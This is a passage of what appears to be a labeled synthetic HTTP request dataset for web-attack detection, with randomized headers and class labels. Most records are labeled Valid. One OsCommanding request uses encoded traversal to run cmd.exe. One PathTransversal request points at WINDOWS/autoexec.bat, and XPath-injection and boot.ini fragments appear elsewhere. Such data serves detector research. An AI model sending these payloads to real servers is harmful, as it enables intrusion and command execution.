X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ysgdp=6&b1o7trnntttd=ngLeETiteod&a6uDacienoae=8z.YU_Cj&uidr=44311785&0TieisnThsor=726   or   teso/q15epg/eni/child::node()[position()=2]     or     1363=&1XN3zhwp-Mbk3=oohDX03&nnmimg=ec z8r eanchildboot.ini'cposition &rW@E4L=365&cdewjFlEe=nebernnenC&M@jj@=l@la&mct0rhd91atmHr=61041927&elq= peni&QDkTerk9d=183488&DSUfZ3=l8h6V&lothacpsi=enon8sFtiaantEa

End - Id: 48551
Start - Id: 24437
class: Valid
GET /iJWCR-rTx63OV1qbRVel/Su97HBn34M9llink/orIUuFBAywP83WrXXN_/ao/ejU7TAFZrGjrcp/l8niduordhpLoncbvii.png?awtriehdu76exnt=8377150684&rKs=efchildo&opifdilactrsmps=038860&rtafroureo=R5t%5Cl2etk&ap=oPfOKx2Nl HTTP/1.1
Host: www.ehehd.net:80
Connection: btets
Accept: video/quicktime
Accept-Charset: ks_c_5601-1987;q=0.5
Accept-Encoding: *
Accept-Language: Ioy1oy-ihavaTd;q=0.6, tei-tgwb;q=0.1, hn9-feq
Cache-Control: no-transform
Client-ip: 118.147.21.138
Cookie: ed3r=l?Nt;emoTeeiy=snlta passthrulgroup by7ash9Cvhg:;rn=5t8bceetcgelei2t)om;UxBzeYU=@;tmra3LnleOa0oe=950637
Cookie2: $Version="89"
Date: Wed, 28 Jul 04 16:05:21 CET
ETag: "jVWfnrsruwZeKSXuOnG"
Expect: 100-continue
From: fzsgce@tis9eot.org
If-Modified-Since: Sat, 02 Dec 06 20:48:07 CET
If-Unmodified-Since: Fri, 03 Dec 04 13:01:13 UTC
If-Match: "ypjy2h@XXz8LdCWjf_"
If-None-Match: *
If-Range: Tue, 02 Mar 04 07:52:12 CET
Max-Forwards: 1
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: NTLM b2VJb2hldGQzdzlzbm5YZHRBdTNwTWVvdG9zVWhteWlu
Range: -78
Referer: http://www.sgcgd.be/tefgE/eoOxhe/tteinola.ace
TE: gzip;q=0.6
Trailer: From
User-Agent: chohbeag3
UA-CPU: StrongARM
UA-Disp: 2319,894,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: 7.0 www.fhjoe.tiff:64, 2.0 205.36.17.119
Transfer-Encoding: gzip
Upgrade: I3r8es/8.7
Warning: 384 232.82.13.199:64408 "wtsat5ea1fS" "Fri, 28 May 04 19:43:14 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24437
Start - Id: 36525
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.sne1o1ym.biz
Connection: uutDtbt
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 65.215.179.86
Cookie: HERng=1adirjn]nceLerippasswdyls
Cookie2: $Version="016"
Date: Sat, 20 Mar 10 07:58:37 CET
ETag: W/"MpfI0bsb1HguCI@Llqy"
Expect: nosdIazv
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Thu, 28 Apr 05 10:29:20 GMT
If-Unmodified-Since: Thu, 24 Apr 08 08:56:53 UTC
If-Match: "3OF@B6v2RpG-mDdi@_BQ"
If-None-Match: "Z-DYOiZ.iK-wTpj1"
If-Range: Wed, 07 Oct 09 24:33:45 UTC
Max-Forwards: 34
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Epaq
Authorization: Basic ZWFwZWVWdXM6a3Q3b2JZ
Range: 17-
Referer: http://ieioe.biz/liEai.swf
TE: deflate;q=0.8,gzip
Trailer: Host
User-Agent: Mozilla/5.2 (X11; U; Open BSD i386 5.9; uw-e6; rv:3.6.6) Gecko/67610784
UA-CPU: Sparc
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 547x5195
Via: 8.9 www.kttt.shtml:6, em6/1.6 194.252.1.84, 3.0 38.37.57.232
Transfer-Encoding: compress
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36525
Start - Id: 12901
class: Valid
GET /eH/tAPM1M4.GfJA/5tObQ3IPN/ezkJvQsljNkx@/oOHLSPCiBT.msf?hf=ltD8ETAO74&CmuNlrezhe=24041253&Hnue=2 HTTP/1.1
Host: www.eiqTityHt.org:98210
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6
Accept-Language: w-ngd;q=0.2
Cache-Control: no-cache
Client-ip: 236.220.231.27
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="3"
Date: Mon, 09 Jul 07 22:40:16 CET
ETag: W/"1x4_d4_FH8Ldut-gak9f"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Sat, 28 Mar 09 06:48:30 CET
If-Unmodified-Since: Wed, 04 Feb 09 14:04:48 CET
If-Match: "NSppLkMOjDdMXRXR"
If-None-Match: *
If-Range: "srmoWTF3Q.Sh18zsw"
Max-Forwards: 0491
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM bzZPZ2JsbmFleXRTbnR5eHJkc2FhaWlzczJudDduczdhaXNtdG5oYWU=
Authorization: mttne evieno9m=opttCr
Range: 976-,-97584
Referer: /wobr4ns/nueiuui/dahiO/beEVahd.cgi
TE: trailers
Trailer: Range
User-Agent: Asf4 (iH-xBBUUo_; evjWoSZ)
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 253x5878
Via: rrStan/3.4 www.diOn4.htm, ntoo/3.1 10.64.164.73, 9.3 252.225.150.201
Transfer-Encoding: compress
Upgrade: ioeah/7.8, nuq/3.5, nnm/0.8
Warning: 007 www.eeatpoht.html "zqonsesaGo" 
X-Forwarded-For: 85.130.149.249
X-Serial-Number: 194126085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12901
Start - Id: 15503
class: Valid
GET /ibu.b/l48s0.q26dT/2ucd/XPkthS3y/fseahs/taoohat5iaiuHdunpMe/4kMe-r/sWADE_9FBaLg/mteiCaaxHiia7snq.dll?hr2z=5&ae=escmd%25iie&akte=84649768 HTTP/1.1
Host: www.llutnAw.cz
Connection: close
Accept: text/*, video/*;q=0.1, text/html;q=0.1
Accept-Charset: x-mac-chinesesimp;q=0.1, windows-1253, x-mac-chinesetrad;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 52.122.232.114
Cookie: eeendeeiwhadshu=Seu;6ydiIsfdsBoiene=d6k;qui=s|sl;aiidturjteeRetf=iy-@le-VkI;vfg=106374
Cookie2: $Version="9"
Date: Tue, 02 Aug 05 08:36:04 GMT
ETag: "_3v6VtLlDAdHJIDC4Jn"
Expect: 100-continue
From: oJs6@aoganier.cz
If-Modified-Since: Thu, 04 Dec 08 05:46:42 UTC
If-Unmodified-Since: Sat, 14 Aug 04 02:12:37 UTC
If-Match: "QbBD5YnbbMJlO4ZG22"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 0.6
Pragma: oaEooeut=oe0
Proxy-Authorization: drol nltaoan=u5pe
Authorization: Digest username="yznMuu"
Range: 5-
Referer: /deuITa/pn7ebde/nad9fyt.php
TE: gzip,trailers,trailers
Trailer: Accept-Language
User-Agent: tEb2J6 http://www.udnosw.it
UA-CPU: Sparc
UA-Disp: 1586,7819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 398x075
Via: FTP/7.6 www.zehf.htm:994, 1.8 www.odtwr85.jpg, 2.8 www.S9Ionrr.jpg
Transfer-Encoding: blee97; eChirm=srhmhut
Upgrade: aeua/3.9, hNtay/3.8, Hhte/8.2
Warning: 534 234.204.240.11 "otaehneciDctischN" 
X-Forwarded-For: 143.27.31.69
X-Serial-Number: 50575175012766315162
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15503
Start - Id: 32670
class: Valid
PUT /rZuSQMjnP-IgYX/592uwthseppm5tt/llld4oennuhv9eetSg/cuOrmyg.shtml? HTTP/1.0
Content-Length: 114
Content-Language: tleifl,yf,eimedEt
Content-Encoding: identity
Content-Location: /teuPuEtd/9e3zo/q8deojEr/htisco.php4
Content-MD5: c2RlRWVlaTVNYW5yd3dyTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 23:12:42 GMT
Last-Modified: Tue, 08 Dec 09 04:24:26 GMT
Host: 104.217.125.183
Connection: keep-alive
Accept: image/*;q=0.4, application/*;q=0.0, application/postscript
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.8, deflate;q=0.8, deflate
Accept-Language: yIom1-s1lm, ahshsi-eEtam9r;q=0.5
Cache-Control: only-if-cached
Client-ip: 240.242.211.106
Cookie: vBB6ipe=tKGPVR9ua;umutmnaegnorrca=8;is=w2WsmTt;MOe6ruetLm=5;62lfXD=systemm
Cookie2: $Version="590"
Date: Tue, 24 Oct 06 14:51:32 GMT
ETag: "iC@IFJ8eF9XYkW6vMz"
Expect: neaOien=ntat;lx0OdGsr=aojsvz9
From: lhr7mem@aapi.biz
If-Modified-Since: Sat, 11 Nov 06 08:40:39 CET
If-Unmodified-Since: Sun, 27 Jan 08 20:01:03 CET
If-Match: *
If-None-Match: "rKJwXbUdsZ54U4Es"
If-Range: "so7PKmc-IyEwd6G5p"
Max-Forwards: 1616
MIME-Version: 8.7
Pragma: tahqiytn=t53
Proxy-Authorization: nsaea Rbis=Iad6tiRh
Authorization: Digest nc=fEbc56cA
Range: 56-7,-5873,44-40303
Referer: http://nn6Huat4.com/ad1mh/asdjbvta/e4pt.cgi
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/9.9 (Windows; U; Win98 6.8; aS-oU; rv:0.2.4) Gecko/41324403
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: HTTP/8.5 12.212.97.186
Transfer-Encoding: identity
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 342 126.45.250.195:34 "QMtcI9" "Fri, 30 Oct 09 22:39:38 UTC"
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 234338027352713339
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RWkwBYmnQR=LierttAOdmmbns&JwherezCuUL=qhs~bdU4ee2&isTOiDk34prss=d6reuwwiBrE3r&AokO=1openandr;toqhfa&kbyaas=699

End - Id: 32670
Start - Id: 1934
class: Valid
GET /iUpdYj6qfzo/eX/7e9htpassformMFnodenEj/lNx9wm/NHuecario0Jrz/4525BmetaautoexecQ1U/8AAKu5sGuCrX8E-/i9F/t2GldvouE2TgB/aW6hxD.jfSfsiTgXISH7/wl.msf? HTTP/1.1
Host: 234.2.83.54
Connection: keep-alive
Accept: audio/basic, text/xml, text/*;q=0.1
Accept-Charset: iso-8859-6;q=0.8
Accept-Encoding: 
Accept-Language: jnli-bu;q=0.9, par-Esnwr6k, paN-eris, noreta1-tb
Cache-Control: no-cache
Client-ip: 157.236.53.20
Cookie: aesravor3Udke3c=tyEqzhqto1jnenntq;tpecw73Hua=b6]latjplt0TKa\eA ;oiapqNeu=ude$aedRGetlEt
Cookie2: $Version="49"
Date: Mon, 25 Aug 08 01:50:20 UTC
ETag: "PWQPSkXE5E4YRllgEd."
Expect: onbfaeti
From: sliheOFe@oSenphus.it
If-Modified-Since: Sun, 05 Sep 04 12:22:45 CET
If-Unmodified-Since: Tue, 07 Jun 05 11:27:43 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Feb 04 14:32:53 GMT
Max-Forwards: 079
MIME-Version: 1.0
Pragma: 3iin='ohgnh7'
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: suela 6evhU=rEewqr
Range: -8,9401-9800,-599
Referer: http://ormadu.org/nondca/3eZ83sod.zip
TE: gzip
Trailer: Accept-Encoding
User-Agent: 5eatgyiWc/7.4
UA-CPU: PowerPC
UA-Disp: 2183,5316,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 4348x363
Via: deNh/4.3 96.38.200.29, 2.1 www.ovoet.tiff, FTP/3.8 86.139.154.102
Transfer-Encoding: oemrbm
Upgrade: fr1/3.0
Warning: 335 124.7.71.254:492 "wCaa" 
X-Forwarded-For: 204.164.3.151
X-Serial-Number: 539815603365
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1934
Start - Id: 23189
class: Valid
GET /-PincludeRGjaY0/e8i5eDRDEhZkeFH.LQ/ri0yEaaseDt/axytHJ2/fgG/wgG_SilipjqI9.eBRGe.nsf?Ieyon=lSd&Teuerttcrte=sswinntr-nelk&aaK=aoze&Ami=gBxz24&g6Px3u6rW8=s%40neejoaortaHXd&sr1=97007836&xe01an9ec6ekt=isrAandnud8rhtgd&J.scriptandLbgsound6=aaA&C.fromOinputBit=+%7C HTTP/1.0
Host: www.qhtb.st:83680
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: knnysOzt-aNdio6t6, eEsrayel-wdt, O7gs1-n1ufSri, mS0ts-soho, oCpsld-o46
Cache-Control: max-stale
Client-ip: 242.122.96.228
Cookie: oe7i0rEFQts=sacereohiyywessn5x;Ju1r=fKNyjg;ehjtUce=2478398;sbwt=01852454;hetep=hpsee;d1UqallAJwhereWp=Yn
Cookie2: $Version="98"
Date: Wed, 06 May 09 16:35:50 UTC
ETag: W/"Xq5.Xw_NbR_Zdkg9UqBS"
Expect: 100-continue
From: yEynS@yostnHon.org
If-Modified-Since: Sun, 23 Jan 05 06:12:01 CET
If-Unmodified-Since: Fri, 04 Mar 05 13:58:55 UTC
If-Match: *
If-None-Match: *
If-Range: "Ep-VN2c-O.a9qba"
Max-Forwards: 8
MIME-Version: 1.7
Pragma: aI=eh
Proxy-Authorization: NTLM OTZodXJlQ3RtWDh0ZThheG40ZWFhZ2lyVHBIZXRpdHZiaGVvc2hI
Authorization: NTLM ZWFzbUNkb3Rtbm9jYm5yZXJUNUF4bm1Tc2Y4ZW5Pb2JvdGV3T3Jlcw==
Range: -993347,19-784
Referer: http://4lEeooo.st/ktefn/sr2Seal/bunda/engtim.mspx
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: uvUakwV8J http://www.aeatrGeL.it
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 973x7584
Via: HTTP/9.1 236.4.175.107
Transfer-Encoding: gzip
Upgrade: Nmotn/6.8, q7lyw3/3.8, lnmv/7.8, r3di3/6.0
Warning: 909 www.n8hewn.css "tEwe81aorN2bNEEtoee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23189
Start - Id: 6120
class: Valid
POST /sm@C35ep/awmeEa0seIo/Zsa7t/rt/riepNxkoru2tbhesi/odDyl9--M/a2FGJagQh29w.3/wvffEvVrFN6/WGVn8.jpg? HTTP/1.0
Content-Length: 256
Content-Language: n,ns,Emrbn
Content-Encoding: compress
Content-Location: /ttira/lntpt7/eiseSyaa/hzohOist.msf
Content-MD5: YjBnaXNtSGN0aHBubWhlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Sep 04 20:45:27 GMT
Last-Modified: Wed, 25 Feb 04 02:14:52 CET
Host: www.ly5nssms.net
Connection: keep-alive
Accept: image/png;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity;q=0.9, deflate
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 2.7.31.61
Cookie: rieart=nertidGoote;dSddOnhtto=kYgSBEqy8do;LkservicesA40ak=s37z3rnlinko@amo;infhX9irltlorej=kK.x4k@5;a1du4h=ehweeehnuhTE;J_2F6RV=:esTojw+rostdinip5h
Cookie2: $Version="3"
Date: Thu, 13 Oct 05 04:20:14 CET
ETag: W/"LgvUzZfMgjoNvwGvu22I"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Mon, 28 Dec 09 20:45:52 GMT
If-Unmodified-Since: Sun, 09 Jan 05 13:49:26 CET
If-Match: "Y_aP-VR4-SKsOjwHp6v"
If-None-Match: *
If-Range: "G@TuK2kjVoXhuYP7A0"
Max-Forwards: 2
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="CC9eD2fe595E5139eF5B49AE1D11f4C0"
Authorization: Digest opaque="iasjptur"
Range: 83-,816517-871,802-100272
Referer: http://gstfi.ch/1ete/xO5i/iEum/amendh6/rriu.nsf
TE: trailers,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: jefEr/0.8.6.0
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7343x178
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: compress
Upgrade: r1lEt/3.5, ltm/6.3
Warning: 924 www.hrht.png:4 "ieats" "Mon, 14 Dec 09 01:46:05 GMT"
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 763044714398
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rcxdknullohY39=55991950&tr8Saaehe=0877&aqr=412728&hnat3mts=systemdaNeEoebreplacecmde0astdint&Pmfpcmmthd8rnhs=npROQBG&uhrosemiph4=o0tmcfae&cuU=OIjm&um4uYnceEemaesc=m1cfEjneso|gnrm&c6kotGo=gwbt1hicLAttt?&atyk=k@https]s3&ntodv=20229306&SSxH-dqDqoOB=dG

End - Id: 6120
Start - Id: 25775
class: Valid
GET /tO/3P/t5sX@18PZ9GL1gbLUpN.gif?87E4uo8REAU=dIIH&suddan=Qyoreid&tedu=Enho5&6ripn=e9uben&7qwLybNoRf=5&arwh259ewnd7=85 HTTP/1.1
Host: www.naeiepoow.fr
Connection: Rlsnbe2
Accept: image/jpeg, application/rtf;q=0.9
Accept-Charset: big5, windows-1257;q=0.8
Accept-Encoding: *
Accept-Language: o-8y2, avd4rlEe-dAi;q=0.7, sh-ga, l-i, ccde0-i;q=0.8
Cache-Control: no-transform
Client-ip: 120.236.226.233
Cookie: VAf5cjXQ=knMltcsrI;b3earHbR=3313260
Cookie2: $Version="549"
Date: Thu, 23 Aug 07 13:43:40 UTC
ETag: "TkphxNdlE_AQ8J5ftEjn"
Expect: 100-continue
From: llantq@at3ooty.biz
If-Modified-Since: Fri, 12 Jan 07 02:11:43 CET
If-Unmodified-Since: Wed, 22 Mar 06 03:07:46 GMT
If-Match: "2GDNiF1Ssw_bGhPA0"
If-None-Match: "8@8uzEzXkBBf4f5rr"
If-Range: "E4RtXRAstN.iD4BwKy7"
Max-Forwards: 0
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest qop=auth
Range: -02113
Referer: /ri4hane3/pudeEoce/abesEuT.mdb
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: onht8rbfintmAgt
UA-CPU: PowerPC
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 291x574
Via: ntny/6.8 www.ooAfEs.jpg, HTTP/1.0 187.21.110.110, 69sa/9.4 195.33.209.188:4423
Transfer-Encoding: compress
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25775
Start - Id: 29372
class: Valid
GET /icnVL-XT/4n/b@E3PxQMRk1.cfm?eot=Rs9EtDtysC&bew=ens6raeoetqseo HTTP/1.0
Host: www.2nqthaAeH.st
Connection: temp9
Accept: image/*;q=0.2, audio/*
Accept-Charset: utf-8;q=0.4, ks_c_5601-1987;q=0.4, utf-8;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: ieeh6Kre='is2hu'
Client-ip: 171.85.6.239
Cookie: IWbFnullXSselectJjm=9
Cookie2: $Version="515"
Date: Fri, 15 Dec 06 19:35:48 CET
ETag: W/"fA3ZKS2Ci0QFLw9dz13"
Expect: srdagi=aiziR;eotA=hhtsgq8o
From: muhbsl@whsoklhxlr.org
If-Modified-Since: Mon, 29 Nov 04 11:20:34 CET
If-Unmodified-Since: Fri, 24 Apr 09 14:49:57 UTC
If-Match: *
If-None-Match: "OmM@KqdLg8OMqMzRx"
If-Range: Mon, 08 Aug 05 03:31:54 CET
Max-Forwards: 0889
MIME-Version: 3.1
Pragma: nb=jcVshai
Proxy-Authorization: NTLM dGR4SWw0YzQ1ZTNvbnJxRW5udWFjb2FsbWVuYzNyaW53ejM3dGVyclZzdG53Y3E=
Authorization: 8tselr hphmlwo=id7l
Range: 60-931,-49,8-736
Referer: /gchdtll.jsp
TE: trailers,chunked,deflate
Trailer: Accept-Charset
User-Agent: su5SYjR9z http://www.5jarnu.cz
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 183x157
Via: HTTP/2.0 58.62.227.18, 8.2 www.chspe6af.png, 3c53r/3.2 201.58.96.1
Transfer-Encoding: gzip
Upgrade: iaepj/3.1
Warning: 369 99.232.247.89 "tt4ao8Ao9o1ecNBed" 
X-Forwarded-For: 10.176.141.74
X-Serial-Number: 725402
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29372
Start - Id: 19984
class: Valid
GET /rHzip0e/gq/iieHRlaajtom/t0Q26vhStdxayeeTMjw8/J0style0MmNOg-UxmlpK4/Hor/jel8sinue7rtypZe8o/ThvarRjYF@UGCwLslike/IiarNa0m/gv.ofAP/iflpttrNpyaf.php?5perl7t=sreohomey+rca+4%40wt%5CsK-s&ohdyonOEde=iFP222zVxl&n6N7tp6c=354444&fne=527032&1dcieEBjazr=%7ChCol HTTP/1.0
Host: 144.155.96.10
Connection: keep-alive
Accept: image/jpeg;q=0.3, image/*;q=0.6, audio/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.8
Accept-Language: ubtmwob-cnl1;q=0.0, bnIhmdf-5EJo, itl-un4l;q=0.5, 8aO-Ooe, etoo-n
Cache-Control: max-stale=6429
Client-ip: 247.152.167.123
Cookie: tdlafqlnt81f=tpWrTeaaO8;eahTnjto=styleer aad piad
Cookie2: $Version="4"
Date: Fri, 23 Jan 04 03:25:00 UTC
ETag: W/"SccEP5Py8@pA0Akew6x"
Expect: 100-continue
From: z3on9@atfseid.cz
If-Modified-Since: Thu, 24 Sep 09 04:38:24 GMT
If-Unmodified-Since: Sun, 30 Mar 08 10:04:23 GMT
If-Match: *
If-None-Match: "S3oq53r7rsUT3p_X"
If-Range: "O@z7myecreJXWCvg"
Max-Forwards: 14
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: saasm Bhhq=rsbnXfm
Authorization: e0ga7 osvlCA=motoOta
Range: 2515-,-14,1-75
Referer: http://ansxc.biz/4S4da/Iun9tar.wmn
TE: gzip;q=0.0,trailers
Trailer: Range
User-Agent: Mozilla/7.1 (compatible; Konqueror/8.4; Mac OS X; nuat)
UA-CPU: PowerPC
UA-Disp: 162,7111,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1394x7760
Via: 8.1 www.vbuaiR.jpeg, 0.6 249.22.111.11, 4.1 207.106.97.57
Transfer-Encoding: gzip
Upgrade: rtfdN/3.1, oi9qe/3.2, 9ny/1.7, blt/9.9, heEn/2.1
Warning: 004 www.ogtrissi.png "oitithegayxtvR" "Thu, 22 Jan 04 08:11:35 UTC"
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19984
Start - Id: 3149
class: Valid
GET /zgE46e@cNIy1VTpMo/qeyJ9V/5o-3CUbv0zhD9vK8g6Fb/9EGmocha4winntbqsPz/oEbeWJvqhvShry/ehrkelyoi5/st_p.ExMkecI6nF.cgi?al=kikgt&rlaa7eEr=325&v6raz8Druato6s=%7E&Eeldvsiaitw=c&iaobt6afEyaoy=%24Fieei%3D%2F&.by_xS=OrrNeu&veeqepa6Ists9s=%241l&asrinstt=u4LheadLna&nadd1ced=t__M&wiwzYoj=htoeE%7E&dnictbmrvd=rDnel&kimg33deleteM8ka=connectarrboconnectdToe%25r HTTP/1.1
Host: www.qhnNlem.com:80
Connection: keep-alive
Accept: text/*;q=0.6, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: tofV-wspose2;q=0.5
Cache-Control: no-cache
Client-ip: 47.186.204.219
Cookie: udeleteO0m=451984;apnbxuaEen8eo5e=88;mInbxf6la1i8w=2234209;rGqsmoteaxapn=r9dto;retseneohni5tnt=ne5u6;9henihhbiesp=[kn t
Cookie2: $Version="69"
Date: Mon, 06 Feb 06 06:01:25 GMT
ETag: "-AJ3BvKDQiLoGn3w"
Expect: itcgr
From: dr3e@eJNrt.cz
If-Modified-Since: Tue, 24 Feb 09 11:56:31 CET
If-Unmodified-Since: Mon, 10 May 04 13:50:03 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Apr 10 18:27:50 UTC
Max-Forwards: 53
MIME-Version: 5.6
Pragma: Erd='nlnu'
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: NTLM ZWhucm1jbWNpbm9hcm9ob25jb3VobG53ZWhTM2dlTHVo
Range: -82153
Referer: /vAeoo7/a3Mrao.tiff
TE: trailers
Trailer: Date
User-Agent: aeoSy (tt_Kcs; nZAl1Wp@j5)
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5717x5114
Via: 5.7 86.102.251.245
Transfer-Encoding: identity
Upgrade: ianerr/8.5
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 181.111.92.64
X-Serial-Number: 545829621
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3149
Start - Id: 45672
class: PathTransversal
GET /hr3eerhcauadst6/pfonZosegcot9dte/Rautoexec5uF@jzF/qrigho/Am/cDDcjuH9bU/u@ot0P5sOG@Y/bYP--aCEC6@gCy.tiff?ztec=83&1JjpS3Qg1=83508117&rior=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&ntchE=kv7XSU&ofktnco=imoso&inrthrmenw6cb=%3Fohei&ee=w%24i&ai=emlryresietn&mocha9padminPmWKNgroup bycz=80&iDuEi9=cateme%40&rosr0nhreywvdm=833840 HTTP/1.0
Host: www.Jaii.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 10.24.0.201
Cookie: iairNtt=nehtqT;eelicieao2zr=iyyD90ch;rposrdk6pemlen=>;Bai0f3e5no=sn;e;lsoeia2idqi0Ee=2a6B
Cookie2: $Version="5"
Date: Sun, 07 Jun 09 23:46:08 GMT
ETag: W/"GIZ.qU7cnYNpxU@"
Expect: 100-continue
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Fri, 05 Aug 05 10:12:45 CET
If-Unmodified-Since: Mon, 19 Apr 10 09:44:19 CET
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Sun, 13 Dec 09 12:39:02 UTC
Max-Forwards: 43
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: ow9V eoqAdp7m=elEsrjii
Range: 64940-,112-
Referer: /tmf7/ms81A.tar
TE: chunked;q=0.7,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (compatible; hclfaqer; Linux i586; DiLaid)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: 09ej
Upgrade: au3/0.3, DRlrd/5.7
Warning: 723 181.1.181.209 "bwtAteeTa4vrnie" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45672
Start - Id: 26446
class: Valid
